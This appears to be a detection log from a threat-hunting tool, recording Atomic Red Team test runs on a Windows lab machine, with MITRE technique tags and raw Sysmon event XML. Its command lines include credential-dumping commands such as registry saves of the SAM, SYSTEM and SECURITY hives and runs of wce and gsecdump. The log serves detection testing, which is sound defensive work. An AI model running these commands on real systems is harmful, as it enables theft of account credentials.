<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549083.336763,2019-07-19T19:11:23.336763+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\security security&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:23.317303Z"">
</TimeCreated>
<EventRecordID>4121</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:23.302</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9B-5D31-0000-00106C1C4B00</Data>
<Data Name=""ProcessId"">7164</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\security security&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549081.105496,2019-07-19T19:11:21.105496+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\system system&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:21.090401Z"">
</TimeCreated>
<EventRecordID>4119</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:21.069</Data>
<Data Name=""ProcessGuid"">747F3D96-DD99-5D31-0000-001069A34A00</Data>
<Data Name=""ProcessId"">4080</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\system system&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549077.243643,2019-07-19T19:11:17.243643+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\sam sam&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:17.224751Z"">
</TimeCreated>
<EventRecordID>4117</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:17.211</Data>
<Data Name=""ProcessGuid"">747F3D96-DD95-5D31-0000-001075964A00</Data>
<Data Name=""ProcessId"">7140</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\sam sam&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549077.224751,2019-07-19T19:11:17.224751+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:17.149274Z"">
</TimeCreated>
<EventRecordID>4116</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:17.139</Data>
<Data Name=""ProcessGuid"">747F3D96-DD95-5D31-0000-0010D6914A00</Data>
<Data Name=""ProcessId"">6264</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1003] Credential Dumping - Process,1563549077.149274,2019-07-19T19:11:17.149274+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\cmd.exe) tried dumping credentials through commandline ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wce -o output.txt&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:17.107912Z"">
</TimeCreated>
<EventRecordID>4115</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:17.097</Data>
<Data Name=""ProcessGuid"">747F3D96-DD95-5D31-0000-0010B38E4A00</Data>
<Data Name=""ProcessId"">5216</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wce -o output.txt&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549077.149274,2019-07-19T19:11:17.149274+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wce -o output.txt&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:17.107912Z"">
</TimeCreated>
<EventRecordID>4115</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:17.097</Data>
<Data Name=""ProcessGuid"">747F3D96-DD95-5D31-0000-0010B38E4A00</Data>
<Data Name=""ProcessId"">5216</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wce -o output.txt&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549077.107912,2019-07-19T19:11:17.107912+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:17.027188Z"">
</TimeCreated>
<EventRecordID>4114</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:17.016</Data>
<Data Name=""ProcessGuid"">747F3D96-DD95-5D31-0000-0010148A4A00</Data>
<Data Name=""ProcessId"">5476</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1003] Credential Dumping - Process,1563549077.027188,2019-07-19T19:11:17.027188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\cmd.exe) tried dumping credentials through commandline ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;gsecdump -a&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:16.986676Z"">
</TimeCreated>
<EventRecordID>4113</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:16.975</Data>
<Data Name=""ProcessGuid"">747F3D96-DD94-5D31-0000-0010F4864A00</Data>
<Data Name=""ProcessId"">3920</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;gsecdump -a&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549077.027188,2019-07-19T19:11:17.027188+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;gsecdump -a&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:16.986676Z"">
</TimeCreated>
<EventRecordID>4113</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:16.975</Data>
<Data Name=""ProcessGuid"">747F3D96-DD94-5D31-0000-0010F4864A00</Data>
<Data Name=""ProcessId"">3920</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;gsecdump -a&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1563549076.48799,2019-07-19T19:11:16.487990+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:08.184716Z"">
</TimeCreated>
<EventRecordID>4111</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3400"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2019-07-19 15:11:03.652</Data>
<Data Name=""ProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ProcessId"">5840</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
<Data Name=""SourcePort"">49744</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">151.101.0.133</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1563549068.184716,2019-07-19T19:11:08.184716+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( &quot;C:\Windows\system32\whoami.exe&quot; /user) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:07.994501Z"">
</TimeCreated>
<EventRecordID>4110</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:07.987</Data>
<Data Name=""ProcessGuid"">747F3D96-DD8B-5D31-0000-001094584A00</Data>
<Data Name=""ProcessId"">5792</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /user</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
